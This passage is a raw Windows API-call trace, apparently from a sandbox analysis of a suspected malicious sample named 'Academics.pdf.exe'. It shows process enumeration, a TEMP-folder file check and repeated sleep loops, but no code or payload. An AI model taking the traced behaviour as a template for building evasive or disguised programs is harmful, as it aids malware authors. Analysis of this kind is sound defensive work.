dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0320.051] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0320.052] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0320.053] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0320.053] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0320.054] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0320.055] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0320.057] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0320.058] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.058] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.059] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.060] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.061] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.062] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0320.062] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.063] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.064] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0320.064] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0320.066] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0320.067] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0320.067] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.068] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0320.069] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0320.070] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0320.071] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0320.071] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0320.072] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0320.073] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0320.074] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0320.075] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0320.075] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0320.076] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0320.077] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0320.078] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0320.079] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0320.079] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0320.080] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0320.081] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0320.082] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0320.083] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0320.083] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.084] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0320.085] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0320.086] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0320.086] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0320.087] CloseHandle (hObject=0x294) returned 1 [0320.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0320.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0320.087] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0320.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0320.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0320.088] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0320.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0320.088] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0320.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0320.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0320.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0320.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0320.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0320.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0320.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0320.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0320.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0320.088] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0320.088] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0320.088] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0320.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0320.089] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0320.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0320.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0320.090] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0320.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0320.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0320.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0320.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0320.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0320.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0320.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0320.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0320.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0320.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0320.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0320.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0320.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0320.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0320.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0320.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0320.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0320.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0320.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0320.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0320.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0320.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0320.091] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0320.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0320.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0320.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0320.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0320.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0320.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0320.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0320.091] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0320.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0320.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0320.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0320.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0320.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0320.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0320.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0320.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0320.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0320.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0320.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0320.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0320.092] timeGetTime () returned 0x4fdcd [0320.092] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.092] Sleep (dwMilliseconds=0xa) [0320.097] timeGetTime () returned 0x4fddd [0320.097] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.097] Sleep (dwMilliseconds=0xa) [0320.112] timeGetTime () returned 0x4fdec [0320.112] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.112] Sleep (dwMilliseconds=0xa) [0320.129] timeGetTime () returned 0x4fdfc [0320.129] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.129] Sleep (dwMilliseconds=0xa) [0320.144] timeGetTime () returned 0x4fe0b [0320.144] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.144] Sleep (dwMilliseconds=0xa) [0320.159] timeGetTime () returned 0x4fe1b [0320.159] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.159] Sleep (dwMilliseconds=0xa) [0320.175] timeGetTime () returned 0x4fe2b [0320.175] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.175] Sleep (dwMilliseconds=0xa) [0320.190] timeGetTime () returned 0x4fe3a [0320.190] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.190] Sleep (dwMilliseconds=0xa) [0320.206] timeGetTime () returned 0x4fe4a [0320.206] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.206] Sleep (dwMilliseconds=0xa) [0320.221] timeGetTime () returned 0x4fe59 [0320.222] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.222] Sleep (dwMilliseconds=0xa) [0320.239] timeGetTime () returned 0x4fe69 [0320.239] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0320.240] Sleep (dwMilliseconds=0xa) 